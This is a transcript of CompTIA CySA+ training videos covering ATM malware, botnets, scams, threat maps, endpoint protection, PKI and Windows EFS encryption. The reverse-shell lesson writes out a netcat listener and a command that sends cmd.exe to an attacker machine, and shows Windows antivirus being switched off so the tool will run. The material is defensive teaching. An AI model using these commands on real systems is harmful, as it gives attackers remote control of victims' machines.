[Video description begins] Security techs should invest time in tracking the dark web in case their
agency/company is being discussed/targeted. [Video description ends]
Now in this case, we're going to talk about a specific ATM piece of malware.
Now the Backdoor.MSIL.Tyupkin malware was one that was widely used in a lot of Eastern Europe years ago.
So what would happen is that the malware would enable software, that would be the malware, to communicate
with the ATM's PIN pad. So that mules, which are essentially people that are sent to the ATM to steal the cash
from it, so to speak, would enter in a specific code that is synchronized with the malware.
Now the malware works, this particular variant of this ATM malware is designed to take advantage of a
problem with a specific DLL used on 32 bit Windows variants used in some bank machines. So at any rate, it
makes some registry changes and it allows then the mule to physically interact with the ATM and request
money to be dispersed from specific cartridges within the ATM that contain cash. So they would have to enter
a cassette number and then it would dispense money. And this particular variant of ATM malware was able to
disperse 40 banknotes from a specific cartridge or cassette within the ATM. So even ATM malware is
available. And again, a lot of these are available as commodities to be purchased or rented on the dark net or
the dark web.
After completing this video, you will be able to describe the proliferation of botnets under the control of
malicious users.
Objectives
[Video description begins] Topic title: Botnets. The presenter is Dan Lachance . [Video description ends]
In cybersecurity parlance, a botnet is a collection of infected systems under singular malicious user control. So
what happens is the malicious user has a command and control or C&C server that is used to pass instructions
to the botnet machines. Now the infected machines in the botnet are referred to as zombies. So seen in our
diagram on the left, we've got an hacker that issues a botnet command. Now that happens through command
and control, or C&C servers which in turn, send those instructions to infected bots, which we know are called
zombies. And those zombies execute the hacker commands.
Now this is the type of thing that might be a commodity on the Dark Net, otherwise called the Dark Web
where you might rent the services of a botnet to flood, maybe a competitor's site with useless traffic to bring it
down during a crucial time. Such as a betting web site that might be flooded with useless traffic during an
important sports event or during an important part of the season, the holiday season, for a retail web site. Now
a lot of this type of activity occurs on the dark net by having anonymous types of connections. So using for
example a Tor tool, like a Tor web browser, or making a connection to the Invisible Internet Project, otherwise
called I2P. This is a higher level type of anonymous network layer. I say higher level in accordance with the
OSI layer, whereby it has its own unique identifiers beyond IP addresses and standard things like that. So it's
very difficult to track and trace.
[Video description begins] Topic title: Reverse Shell. The presenter is Dan Lachance. [Video description
ends]
You know, if you can trick somebody into doing something or installing software or clicking a link, you can
take over pretty much anything.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
User training and awareness of this is absolutely paramount in mitigating social engineering attacks which
leads to well, pretty much everything else. Let's talk about how easy it is to set up a reverse shell. A reverse
shell allows a victim machine, perhaps that's been infected with malware, to make an outbound connection to
the attacker's station. So it defeats most firewalls in that sense. Because often a firewall won't let connections
initiated from the outside. That's why reverse shells are popular in the malicious user world. So to get started
here in Kali Linux, I'm going to run the netcat command line tool that's nc. And I'm going to use the -lvp
parameter set. Now l means listening port, which I'll specify in a moment. v is verbose, and p of course is port.
So I'm going to go ahead and specify a port number, let's say of 81.
[Video description begins] He executes the following command: nc -lvp 81. [Video description ends]
What this means is I am listening on my attacker station, it says on any IP address, I didn't specify an interface
on port 81. What am I listening for? I am waiting for infected machines to come back and talk to me. So how
would a machine be infected? Well, there are innumerable ways that can happen. What we're going to do,
switch over to a Windows 10 station. Here in Windows 10, I have gone to a web site where I can download
netcat for Windows.
[Video description begins] A web page labeled "netcat 1.11 for Win32/Win64" opens. [Video description ends]
Now realistically, an attacker would find a way to trick a user into clicking on something that would install this
on their machine. But here we're going to willingly download and install netcat on Windows 10.
[Video description begins] The Command Prompt window opens. The following prompt is displayed: D:\
netcat-1.11>. [Video description ends]
So I'm going through the steps manually and attacker would automate this and have it run on the background
unknown to the victim. So here I'm going to type a DIR, I'm in the directory where I've installed netcat.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. The following prompt is displayed: D:\netcat-1.11>. [Video
description ends]
And I can see, for example, the nc.exe, here a Windows 10 netcat. So I'm going to clear the screen with cls,
and I'm going to type nc and then the IP address of the Kali Linux station that is currently waiting for
connections on port 81. So, I'm going to put in a space port 81, and what I want to execute -e is cmd.exe. Now
of course, I'm typing this in willingly and manually again, an attacker would normally do this in stealth mode.
This would be automated in a script or embedded within an executable, that the user's tricked into running. All
right, I'm going to press Enter and now we're going to flip back to Kali Linux.
[Video description begins] He executes the following command: nc 192.168.4.52 81 -e cmd.exe. [Video
description ends]
Now in this case, I have a message in Windows 10 that says the system can't execute the specified program.
Well, that's probably because I have anti-malware real time protection enabled.
[Video description begins] A window labeled "Windows Security" opens. It is divided in two parts. The first
part is a navigation pane. The second part is a content pane. The navigation pane includes options labeled
"Home", "Virus & threat protection", and "Device security". The Virus & threat protection option is selected.
The corresponding page is open in the content pane. It includes sections labeled "Last scan", "Quarantined
threats", and "Virus & threat protection settings". [Video description ends]
So here in my Virus & threat protection in Windows 10. I'm just going to go down and click Manage settings
under Virus & threat protection settings and I'm going to turn off Real-time protection.
[Video description begins] In a section labeled "Real-time protection", he turns off the toggle button. A dialog
box labeled "User Account Control" dialog box opens. It includes a button labeled "Yes". [Video description
ends]
And I'll choose Yes. Now, of course, you would normally never do this.
[Video description begins] The User Account Control dialog box closes. [Video description ends]
But for this demonstration, I am going to do that. Again a malicious user could trick a user into doing
something similar, but of course, netcat is an old tool. Often developers will build newer tools, malicious
developers, newer exploits that aren't so easily detected.
[Video description begins] He points to a section labeled "Threat history". [Video description ends]
Now, if I take a look at the Threat history on this host, notice that we've got a quarantined threat. It's the netcat
hack tool.
[Video description begins] In the Quarantined threats section, he points to a threat labeled
"HackTool:Win32/NetCat". He expands an arrow icon adjacent to it and buttons labeled "Restore" and
"Remove" are displayed. [Video description ends]
Okay, well, I'm going to choose Restore because we are in testing mode, we know it's a malicious tool at least
normally it's used for malicious purposes.
[Video description begins] The User Account Control dialog box opens. He clicks the Yes button. The User
Account Control dialog box closes. [Video description ends]
But we're going to restore it back so we can run the command again. Back here in the command prompt, if I
run DIR, I can see that nc.exe is back.
[Video description begins] He switches to the Command Prompt window. The dir command and its output is
displayed. The output lists all files and subdirectories contained in a specific directory. [Video description
ends]
So we're going to use the up arrow key so that we can run our command once again. This time it runs.
[Video description begins] He executes the following command: nc 192.168.4.52 81 -e cmd.exe. No output
displays. [Video description ends]
Let's go back and check Linux now that we've gotten around the anti-malware real time protection.
[Video description begins] He switches to the Terminal window. The following prompt is displayed: D:\netcat-
1.11>. [Video description ends]
This is what I see in Kali Linux. I've got a command prompt session without remote host.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. [Video description ends]
So I can do anything I want here. It looks like I'm in Windows I'm not, I'm in Kali Linux. So I can start to take
a look at the file system on that machine.
[Video description begins] He executes the following command: c:. The following prompt is displayed: C:\
Users\danla>. [Video description ends]
[Video description begins] He executes the following command cd /. The following prompt is displayed: C:\>.
He executes the following command: cls. [Video description ends]
\If I go into a specific folder to get something or to look around, I can also see what's there.
[Video description begins] He executes the following command: cd media. The following prompt is displayed:
C:\Media>. He executes the following command: dir. The output lists all files and subdirectories contained in
a specific directory. [Video description ends]
I have fully privileged command line access based on whoever's logged in about Windows host. That is, of
course I have their level of privilege. But the point is, this is pretty darned easy to do. So it really does
highlight the importance of having up-to-date anti-malware tools. Some people are of the opinion that you
don't really need anti-malware solutions, since a lot of the newer exploits won't even get detected anyways,
nothing could be further from the truth as evidenced in this example.
10. Video: Internet Scams (it_cscysa20_04_enus_10)
In this video, find out how to view an analysis of various scam websites.
Objectives
[Video description begins] Topic title: Internet Scams. The presenter is Dan Lachance. [Video description
ends]
There are so many scams out there on the Internet, it's enough to make a cybersecurity analyst's head spin.
[Video description begins] The Outlook mailbox opens. An email is open. [Video description ends]
Here's an example of an email message sent to someone where it says, hey, I know your password. And I've
infected your computer, and I've recorded you through your webcam. And after that, I've removed my
malware, not leaving any traces. As we scroll down, essentially, this is blackmail. It says transfer exactly $900
through bitcoin. Here's the bitcoin address, and you have two days to do it.
[Video description begins] He highlights an alphanumeric bitcoin address. [Video description ends]
Otherwise, any video that I've taken through your infected computer will be made known to the world. Now,
nine times out of ten, this is not true anyways. And even if it were true and you paid this amount of money,
what's to say they won't extort you for more? It's something to stay away from. This is playing upon people's
fears, to pay up. And here's another wonderful example about a doctor that has left, apparently, $9.3 million.
And the bank has asked some kind of a lawyer or an attorney to find next of kin to get the money, and please
reply. And there's a Gmail address that's being supplied. Well, this isn't necessarily playing on people's fear, is
it? This is playing on people's greed. There is no such thing as easy money. What are the chances that you've
got a distant relative in another country that left a large sum of money, and that you're the next of kin? People
need to think carefully about these types of scams. And there are just so many out there. And that's why sites
such as the ARTISTS AGAINST 419 are in existence.
[Video description begins] A web site labeled "ARTISTS AGAINST 419" opens. An index page is open. It
includes a table with four columns and six rows. The column headers are GENERAL FORUMS, TOPICS,
POSTS, and LAST POST. The GENERAL FORUMS column includes entries such as General Issues, Thread
of Shame, Report a Scam, and Chat. [Video description ends]
There are plenty of sites out here that are focused on fraud and scams, and what to do about it, what to look out
for. So for example, if I click on the Thread of Shame, here I'll see a lot of topics about problems.
[Video description begins] A table with four columns and several rows is displayed. The column headers are
TOPICS, REPLIES, VIEWS, and LAST POST. The TOPICS column includes entries such as handelfarms.com
and If attend school just for getting a degree, why not buy it? [Video description ends]
For example, what do we see here? If attending school for getting a degree, why not just buy it? Okay, so this
must be one of those scams where someone could just go online and pay for some kind of a university diploma
or degree.
[Video description begins] He clicks the If attend school just for getting a degree, why not buy it? entry. The
corresponding topic opens. [Video description ends]
And we can see here that the Link is a SCAM. Well, we're going to go take a look at it right now.
Now, you should not just follow links that are really conducive to scams, because you might also infect your
computer. You can infect your computer by just looking at a web site, not even clicking on anything. It's
possible, so be very careful in doing this. I'm going to do this in a sandbox controlled environment. Now, the
thing about a lot of these scams is that the sites look legitimate. It looks professional.
[Video description begins] A web site labeled "DIPLOMA123" opens. He scrolls through this web site. [Video
description ends]
However, really, what are they offering, fake certificates, fake degrees. Thing is, a lot of these scams could
take the form of gathering your information, and then trying to blackmail you because you tried to partake in
this illegal activity. So we see a lot of this stuff out there on the Internet. But usually, if something's illegal,
you know buying a driver's license or some kind of a transcript, obviously, is not above board. Stay away from
this, naturally.
[Video description begins] He closes the DIPLOMA123 web site and switches to the ARTISTS AGAINST 419
web site. [Video description ends]
And of course, watch out for things like blackmail, if you do decide to partake in this type of illegal activity.
Now, going back to the aa419, ARTISTS AGAINST 419 site, there are also other things we can look up
besides the Thread of Shame, things to watch out for. You also have the option of reporting scams. If I click
Report a Scam, then we can see there are lots of forum listings here for this type of thing as well, such as fake
banks.
[Video description begins] He clicks the Report a Scam entry. [Video description ends]
If I click, I can read the details about that type of scam. So if this is really feeding your cynicism, that's
probably a good thing. We need to translate that to our end user base, to be cynical, suspicious, untrusting of
essentially anything that they're dealing with in the digital world. Whether it's a message they're receiving
through email or through instant messaging of some kind. Or an SMS text message to, you know, send money
in escrow for something that you want to buy through Craigslist or something like Kijiji in Canada. Always be
cynical and very careful about what and who you trust online.
[Video description begins] Topic title: Malware Dashboard. The presenter is Dan Lachance. [Video
description ends]
There are many different types of real time dashboards that are used to show you threats related to infections or
denial-of-service or distributed denial-of-service attacks to name just a few.
[Video description begins] A web site labeled "CYBERTHREAT REAL-TIME MAP" opens. It includes tabs
labeled "MAP", "STATISTICS", "DATA SOURCES", and "BUZZ". The MAP tab is selected. It includes a
globe and a legend. The legend includes items labeled "OAS", "ODS", and "IDS". [Video description ends]
Now there are some that are available out on the Internet such as what we're going to look at here. But of
course, this can also be tailored to an internal organization, by receiving threat information from intrusion
detection and prevention sensors throughout the network and running on hosts as well as malware threats being
detected and sent back to a central location. You can get this kind of insight within a single organization. So
here we're looking at the Kaspersky labs picture of the globe with the number of different threats. And it's kind
of neat to look at, you can scroll around and look at different parts of the planet. And the other thing is that you
can click on any of these items down here in the legend and remove them from appearing. So you can kind of
reduce how much you're looking at.
[Video description begins] In the legend, he unselects few items. [Video description ends]
[Video description begins] He clicks the STATISTICS tab. The corresponding tab opens. It includes a graph
and a legend. The legend includes items labeled "OAS", "ODS", and "IDS". [Video description ends]
If I click STATISTICS, we can see the number of DETECTIONS PER SECOND, for each of these items. We
can see, we've got a real time graph. So, if we were to highlight or hover rather over IDS, it's Intrusion
Detection Scans whereas ODS is On-Demand Scans, On-Access Scans is OAS. So this is retrieving data from
a number of data sources related to the Kaspersky anti-malware tool. That's where a lot of this stuff is coming
from.
[Video description begins] He clicks the DATA SOURCES tab. The corresponding tab opens. It includes tiles
labeled "OAS - On-Access Scan", "MAV - Mail Anti Virus", and "WAV - Web Anti-Virus". [Video description
ends]
So we have a lot of different things that we can view about these types of threats.
[Video description begins] He switches to the MAP tab. [Video description ends]
Now at the same time, we can also see popped up automatically, says Canada is the number 28
[Video description begins] A pop-up box labeled "CANADA" opens. It includes a link labeled "More
details". [Video description ends]
most attacked country at least at this point in time. And we can see the number of occurrences for different
types of scans, or whether we've got infections through mail anti-virus scanning. We can click More details,
and we can actually get in listing of names of specific problematic malware.
[Video description begins] The STATISTICS tab gets selected. It displays HISTORICAL STATISTICS PER
COUNTRY. The top local infections of last week are displayed in graphical format and tabular form. The table
displays a list of infection and their corresponding percentage. [Video description ends]
For example, if I click one of these HackTool pieces of malware, it will try to find it in the Kaspersky lab's
database to give me a description as to what it's about.
[Video description begins] He clicks an infection labeled "HackTool.MSIL.KMSAuto.dh". A web site labeled
"kaspersky THREATS" opens. A page labeled "HACKTOOL.MSIL.KMSAUTO" is open. [Video description
ends]
So this one is about activating unregistered Microsoft software products. And, if I click on let's say a Trojan
listed here,
[Video description begins] He closes the kaspersky THREATS web site. He switches to the STATISTICS
tab. [Video description ends]
[Video description begins] He clicks an infection labeled "Trojan.Script.Generic". In the kaspersky THREATS
web site, a page labeled "TROJAN.SCRIPT.GENERIC" opens. It includes a world map. [Video description
ends]
So, it doesn't really give me a whole lot of details, but it does give me a bit of a geographical breakdown on a
map of the hotbeds of activity. We can see the legend down here. Red naturally, has the most number of
occurrences, the percentage of users where that is happening, that specific Trojan.
[Video description begins] He closes the kaspersky THREATS web site. He switches to the STATISTICS
tab. [Video description ends]
Now there are many different other web sites like this as well.
[Video description begins] In the browser, he switches to another tab. A web page labeled "Fortinet Threat
Map" is open. It includes a world map and a table. The table has three columns and several rows . The column
headers are ATTACK, SEVERITY, and LOCATION. [Video description ends]
So I've got the Fortinet Threat Map here, where I can kind of see the source and destination of a lot of different
types of attacks, which are flowing by very quickly down below like integer overflow attacks and denial-of-
service attacks.
[Video description begins] He points to the entries in the table. [Video description ends]
I can also go to LookingGlass Cyber, to get another picture of the world on the map, where I can see a lot of
details down below.
[Video description begins] In the browser, he switches to another tab. A web page labeled "THREAT MAP by
LookingGlass" is open. It includes a world map and the corresponding information about INFECTIONS /
SECOND, LIVE ATTACKS, BOTNETS, and COUNTRIES. [Video description ends]
I can see a number of live attacks. Specifically, I can see a lot of where those attacks are coming from. And I
can also see botnet listings. Botnets, remember, are collections of infected hosts that are under singular
malicious user control, such as Sality, Mobile, Conficker, ZeroAccess, and so on. Conficker is a worm type of
malware that's self-propagating. And, if enough of those are under singular control, it constitutes a botnet. We
can also see the percentile listing here for countries where we've got threats, so China, India, Iran, Egypt, and
so on and so forth. So these are quite interesting in that they give us a sense of how much activity on the
Internet is actually malicious and that it's happening all of the time.
[Video description begins] Topic title: Endpoint Security. The presenter is Dan Lachance. [Video description
ends]
Where possible, every computing device should have some kind of anti-malware threat protection.
[Video description begins] The Windows Security window opens. It is divided in two parts. The first part is a
navigation pane. The second part is a content pane. The navigation pane includes options labeled "Home",
"Virus & threat protection", and "Device security". The Virus & threat protection option is selected. The
corresponding page is open in the content pane. It includes sections labeled "Last scan", "Quarantined
threats", and "Virus & threat protection settings". [Video description ends]
Now, that might not be possible with a specialized medical device, but it would be possible with standard
smartphones of any type, tablets, laptops, desktops, servers, whether they're physical or virtual. It's very
important that every device has some kind of threat protection installed and that it's reporting to a central
location. Here in Windows 10, I've got Virus & threat protection settings opened up, so we can see that Real-
time protection is turned On. So not only do we have the option of scheduling scans looking for malicious
threats on the machine, but we can also watch user activity in real-time to detect, for example, if a user is
trying to download something that is infected. As an example, I'm going to try to download netcat.
[Video description begins] A web page labeled "netcat 1.11 for Win32/Win64" opens. It includes a link labeled
"netcat 1.11". [Video description ends]
Netcat is a tool that's often used to set up reverse shells between a victim machine that's reaching out and
contacting an attacker station, where the attacker can issue commands. And because it's being initiated from
the victim machine on the victim network, it defeats a lot of firewall rules that might be put in place. So I'm
going to go ahead and click on the link to download netcat.
[Video description begins] He clicks the netcat 1.11 link. The file explorer window opens. The Downloads
folder is open. It includes a drop-down list box labeled "File name" and a button labeled "Save". In the File
name drop-down list box, an option labeled "netcat-win32-1.11.zip" is selected. [Video description ends]
And I'm just going to go ahead and Save this, and it says Failed - Virus detected. Well, that's because of my
real-time protection that we were just looking at.
[Video description begins] He switches to the Windows Security window. [Video description ends]
Let's go back into our Virus & threat protection settings, and let's turn that Off. Now, you would never
willingly do this in reality.
[Video description begins] In the Real-time protection section, he points to the toggle button. [Video
description ends]
All I'm trying to demonstrate is how malicious users can trick or have scripts that will turn off Virus & threat
protection settings, such as turning off Real-time protection in the background.
[Video description begins] He turns off the toggle button. The User Account Control dialog box opens. He
clicks the Yes button. The User Account Control dialog box closes. [Video description ends]
So now, let's try to download netcat once again, and let's just go ahead and save that.
[Video description begins] He switches to the netcat 1.11 for Win32/Win64 web page. [Video description ends]
This time, it doesn't see a virus was detected, it downloaded, no problems at all.
[Video description begins] He clicks the netcat 1.11 link. The file explorer window opens. The Downloads
folder is open. In the File name drop-down list box, "netcat-win32-1.11.zip" option is selected. [Video
description ends]
So we could open up the zip file here and run the installation.
[Video description begins] He opens the Command Prompt window. The following prompt is displayed: D:\
netcat-1.11>. [Video description ends]
Now, I have run the installation and this malware, it's considered malware, not necessarily because it's a virus
or some type of infection, but it is often used for reverse shells, as we've mentioned.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. [Video description ends]
So I can now see by typing dir, where I've installed it on drive D, that it's listed here, including the executables
to actually run netcat or nc.
[Video description begins] He switches to the Windows Security window. [Video description ends]
Now, if I actually have Real-time protection on, even though it's already here, it should detect them trying to
run it, and it should quarantine or remove it, depending on my anti-malware settings on this device.
[Video description begins] In the Real-time protection section, he turns on the toggle button.
[Video description begins] The User Account Control dialog box opens. He clicks the Yes button. The User
Account Control dialog box closes. [Video description ends]
[Video description begins] He switches to the Command Prompt window. In the output, he points to
nc.exe. [Video description ends]
[Video description begins] He executes the following command: nc. The window prompts: Cmd line:. [Video
description ends]
So I'm going to go ahead and try to run that executable, maybe we'll give it a command line, I'll just give it
some kind of an IP address and a fake port number that I want it to connect to.
Then, when we run a tool that is known to be malicious in some way, then when we look at our threat history,
we'll see that we have a quarantined threat.
[Video description begins] He switches to the Windows Security window. [Video description ends]
This one is listed as being HackTool:Win32/NetCat, it's got a High severity rating.
[Video description begins] He points to the Quarantined threats section. [Video description ends]
So I'm going to go ahead and choose remove to get rid of that threat.
[Video description begins] He clicks the Remove all button. The User Account Control dialog box opens. He
clicks the Yes button. The User Account Control dialog box closes. The HackTool:Win32/NetCat threat gets
removed. [Video description ends]
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to protect user sensitive information from social engineering scams, as
well as how to protect assets from malware. We did this by exploring different malware types, various forms
of social engineering and their related security risks. We looked at authentic email phishing messages. Talked
about how social engineering attacks are executed or can be executed using the Social Engineering Toolkit or
SET.
We talked about the danger of ransomware and how to mitigate this threat. We talked about how malware and
botnets have become black market commodities, and the proliferation of botnets under malicious user control.
We talked about how to configure a reverse shell, how to use the Malzilla tool to explore malicious web pages.
We took a look at a GUI malware dashboard, and finally, we looked at how to configure malware settings on
an endpoint device. In our next course, we're going to move on to explore the use of cryptography, or crypto,
for protecting IT systems and data, including talking about public key infrastructure, PKI, talking about
encryption, and talking about hashing.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats, and risks to an organization. To configure and use threat detection
tools, and secure and protect an organization's applications and systems. Cryptography is designed to protect
data at rest and in transit.
In this course, you'll learn about PKI hierarchy, how cryptography protects sensitive data, and how to protect
data at rest using UPS and BitLocker and on Linux and cloud storage. In addition, you'll examine hashing,
including how to generate file hashes for Windows and Linux.
Finally, you'll learn about using SSL and TLS to secure network traffic, cloud CA deployment, and certificate
issuance. This course can be used in preparation for the CompTIA Cybersecurity Analyst (CySA4)
certification exam CS0-002
Upon completion of this video, you will be able to list the components of a PKI hierarchy.
Objectives
[Video description begins] Topic title: PKI Hierarchy. The presenter is Dan Lachance. [Video description
ends]
Using PKI, or Public Key Infrastructure, is a great way to secure things like network communications and data
at rest. PKI is a hierarchy of digital security certificates, and the certificates get issued and managed by what
are called Certificate Authorities, or CAs. You can have a private CA, where you install and control and
configure it entirely within the organization, or you can use the services of a public CA that is trusted
internationally. The benefit of which is that any certificates from the public CA will be trusted by all devices.
With private CA certificates, in order, for example, a smartphone in the company to trust a private CA
certificate for internal website, the mobile device has to be configured to trust the private CA. It won't be
automatic. The PKI hierarchy begins at the top with the root certificate authority, or root CA. Now, the root
CA can be used to issue certificates. But in a larger enterprise, what happens is the root CA is used to generate
subordinate CAs, maybe for different regions, different countries, different business units, different projects,
whatever the case might be. And each subordinate CA in turn issues and controls its own PKI certificates,
whether those certificates are for users, devices, or software entities. So with PKI, the issuing certificate
authority digitally signs the certificates that it issues with a private key. If you're using a root CA, well, you're
going to be either way, whether you deal with a root CA issuing certificate or a root CA with subordinate CAs.
The CA should always be brought offline when possible. This is because if it gets compromised, specifically a
root CA, all subordinate certificates at every subordinate level is compromised. If a subordinate CA is
compromised, not that it's a good thing, but only the certificates issued under that part of the hierarchy would
then be compromised.
So a PKI Certificate, then, is issued by a CA, a certificate authority, is issued to a user, or device, or a software
entity for the purpose of security. Whether that be encryption for confidentiality or integrity, so that we can be
assured data hasn't been tampered with or corrupted. Or whether it's for authentication, so that we know, for
example, an email message truly came from who it says it came from. Now the PKI certificate itself is a file,
but it can also be written into other devices like smart cards.
And the certificate can contain many things like, the X.509 version number, X.509 is the PKI standard, the
signature of the CA, the signature algorithm used by the CA. Every certificate has a serial number, and it's
stored in the certificate itself, along with the date the certificate was issued and when it expires. Because after
the expiry it can no longer be used. The intended use of the certificate, whether it's for encrypting file system
entries or for digitally signing email messages. The subject name would be the entity to which the certificate
applies. So for a website, it would be the URL of the website, or it could be the email address of a user, that
type of thing. Also, a public and private key pair is generated that is unique for this entity. And the keys will be
stored in the certificate. Now, there are ways that you can export just the public key part of the certificate if
you wanted to share that with others. For example, if they need something so that they can encrypt email
messages they want to send to you. You don't want to give them the private key, just the public, which is used
to encrypt.
[Video description begins] Public and Private Keys. [Video description ends]
So then we've got public and private key pairs. Now, the public key can be shared publicly, and that's why it's
called that and there's no security risk with doing this. Now when you encrypt a mail message to somebody,
you need the recipient's public key. You also use a public key to verify a digitally signed message. Now
private keys, as you might guess, need to be kept private, must be available only to the key owner. And it can
be embedded in cards. You use private keys to read encrypted messages, so encrypted messages get decrypted
using this key, or to create a digital signature. Digital signatures are used so that the recipient can rest assured
the message really does come from who it says it came from.
[Video description begins] Topic title: Cryptography. The presenter is Dan Lachance. [Video description
ends]
Cryptography has been used in one way or another for centuries, actually for millennia, for thousands and
thousands of years. And really, the overall purpose of cryptography or crypto hasn't changed. It's all about data
security. Cryptography provides confidentiality, integrity, and source authentication. Of course, in our modern
age, we're talking about how that's done at the digital level with security solutions.
Integrity and Authentication is a core part of trusting data. Whether it's a file on disk, a row in a table within a
database, or a piece of network communication. Now one way to do Integrity and Authentication is through
File hashing. File hashing is used to ensure that we can track that a file has been changed in any way or to
ensure that it hasn't been if we don't want it to be corrupted when we download it over the Internet. As an
example, integrity authentication has everything to do also with email digital signatures. If you want to
digitally sign an important email message that you're sending to a colleague so they can be assured it really
came from you, you do that using your private key. Then normally, in a mail program, it's just a button or
might be turned on by default to sign the message, but in the background, it's using a private key, to create a
hash an encrypted and send it off. The recipient needs you really the public key to verify the validity of that
digital signature. Integrity and authentication can also be used to establish trust when the VPN tunnel becomes
online. And also it's used in blockchain for cryptocurrencies. Confidentiality means encryption.
And so that could mean the encryption of email messages, files on the disk, or entire disk volumes. We can
also use crypto for confidentiality to protect what's being sent through a VPN network tunnel.
So encryption starts by acquiring an encryption key. Next, the key and the plain text that we want to protect are
sent into an encryption algorithm. In other words, a large complex mathematical formula. The encrypted result
is called ciphertext. And you have to possess the correct key in order to decrypt the message, which results
back in to seeing the original plain text that was in existence prior to being fed into the encryption algorithm
with the key.
4. Video: Encrypting File System (it_cscysa20_05_enus_04)
[Video description begins] Topic title: Encrypting File System. The presenter is Dan Lachance. [Video
description ends]
Encrypting File System, or EFS, is built into most Windows versions or editions and allows the encryption of
individual files or folders on an NTFS volume. The items get encrypted for the user that's currently logged in.
But if you're using an edition of Windows, let's say Windows 10 Home, forget it, EFS is not available.
[Video description begins] The File Explorer window is open, in which the New Volume (D:) drive is open. It
contains a folder labeled "Budgets". [Video description ends]
So here, I've got Windows Server 2019 Datacenter Edition and I'm in the Windows Explorer tool where I've
got a disk volume Drive D.
[Video description begins] He right-clicks the New Volume (D:) drive and a shortcut menu opens. It includes
an option labeled "Properties". [Video description ends]
And if I right click on it, check out its Properties indeed, we can see it's been formated with the NTFS File
System.
[Video description begins] He selects the Properties option and its corresponding dialog box opens. [Video
description ends]
Now I do have the option of right clicking on a folder or an individual file and going into the Properties here in
the GUI and under Advanced choosing to encrypt the contents to secure data.
[Video description begins] He clicks a button labeled "Cancel" and the dialog box closes. [Video description
ends]
Now if that's grayed out, it's probably because you don't have an NTFS volume.
[Video description begins] He opens the Budgets folder, which includes a file labeled "Budget2". He then
right-clicks the Budget2 file and a shortcut menu opens. It includes an option labeled "Properties". He selects
the Properties option and a dialog box called "Budget2 Properties" opens. [Video description ends]
But we can also encrypt and decrypt at the command line level.
[Video description begins] He clicks a button labeled "Advanced" and a dialog box labeled "Advanced
Attributes" opens. He then points to a checkbox labeled "Encrypt contents to secure data". [Video description
ends]
[Video description begins] He closes the Advanced Attributes and Budget2 Properties dialog boxes. [Video
description ends]
So here's drive D, we can see there's the Budgets folder, and we can see what's in the Budgets folder.
[Video description begins] He opens a window called "Administrator: Command Prompt". The prompt "D:\>"
is displayed. [Video description ends]
[Video description begins] He executes the following command: dir. The output displays a list of folders in
drive D. It contains a folder labeled "Budgets". The prompt does not change. [Video description ends]
I'm going to start by just running cipher with no parameters, it'll pick up the current location of drive D.
[Video description begins] He executes the following command: dir Budgets. The output displays a list of files
in the Budgets folder. The prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cls and the screen clears. He then executes
the following command: cipher. The output reads "Listing D:\ New files added to this directory will not be
encrypted. U Budgets". The prompt does not change. [Video description ends]
If I go into the Budgets folder and do the exact same thing, just run the cipher with no parameters,
[Video description begins] He executes the following command: cd Budgets. No output returns and the prompt
changes to "D:\Budgets>". He then executes the following command: cipher. The output displays a list of
files. [Video description ends]
new files added to this directory will not be encrypted. And currently the four files here have been huge means
they are unencrypted. Okay, well let's change this up a little bit. There a couple of ways we could do this. So
we're going to do it here, for example, in the command line, I'm going to use
[Video description begins] He executes the following command: cd. No output returns and the prompt does not
change. He then executes the following command: cd /. No output returns and the prompt changes to "D:\
>". [Video description ends]
cipher/e for encrypt, as you might guess, /d would be for decrypting. I'm going to tell it I want to encrypt the
Budgets folder, and it says,
[Video description begins] He executes the following command: cls and the screen clears. He then executes
the following command: cipher /e Budgets. The output displays that the Budgets folder is encrypted. [Video
description ends]
encrypting files and D budgets, okay, looks good. Well, let's change directory into Budgets. Let's just run
cipher by itself once again.
[Video description begins] He executes the following command: cd Budgets. No output returns and the prompt
changes to "D:\Budgets>". He then executes the following command: cipher. The output displays a list of
files. [Video description ends]
And notice this time it says new files added to this directory will be encrypted. Now the other thing we have to
bear in mind though, is that we didn't recursively tell it to encrypt everything in an under the Budgets folder.
So we still have those four files in there that are no longer encrypted. Well, that's interesting.
[Video description begins] In the output, he points to the files. [Video description ends]
So if we were to use notepad, let's say to make a new file, and let's save it in the Budgets folder and see what
happens.
[Video description begins] He executes the following command: notepad. No output returns and the prompt
does not change. The Notepad window opens. He enters the text, "new file". [Video description ends]
[Video description begins] He selects the File menu and then selects the Save As menu option. The File
Explorer window opens. [Video description ends]
It's going to go in the budgets folder. Why don't we just call a Budget 5. Now if I do a listing here in the
budgets folder, with DIR it's windows.
[Video description begins] He executes the following command: cls and the screen clears. He executes the
following command: ls. No output returns and the prompt does not change. He then executes the following
command: dir. The output displays a list of files in the Budgets folder. [Video description ends]
We've got budgets 1 through to 5. But if we run cipher we'll see whether or not through encrypted, notice
Budget 5 has an E because it is encrypted. So if I were to run cipher /e *.*, it says four files were encrypted.
But how?
[Video description begins] He executes the following command: cipher. The output displays a list of files. He
executes the following command: cipher /e *.*. The output displays that four files were encrypted. The prompt
does not change. [Video description ends]
Okay, let's take a look now indeed, we can see that those files are now all encrypted.
[Video description begins] He executes the following command: cls and the screen clears. [Video description
ends]
[Video description begins] He executes the following command: notepad Budget1.txt. No output returns and
the prompt does not change. A file called "Budget1” opens in the Notepad window, which contains the text,
"Sample Data". [Video description ends]
it just opens, decrypts it. And I can see it, it's transparent. Because I'm logged in with the same user account
that was used for encryption. And so other users that might try to access that file when they logged in with
their account for example, if this is a shared work station in work environment we'll get an access tonight
message when they try to open any of these files.
[Video description begins] He points to the files in the output. [Video description ends]
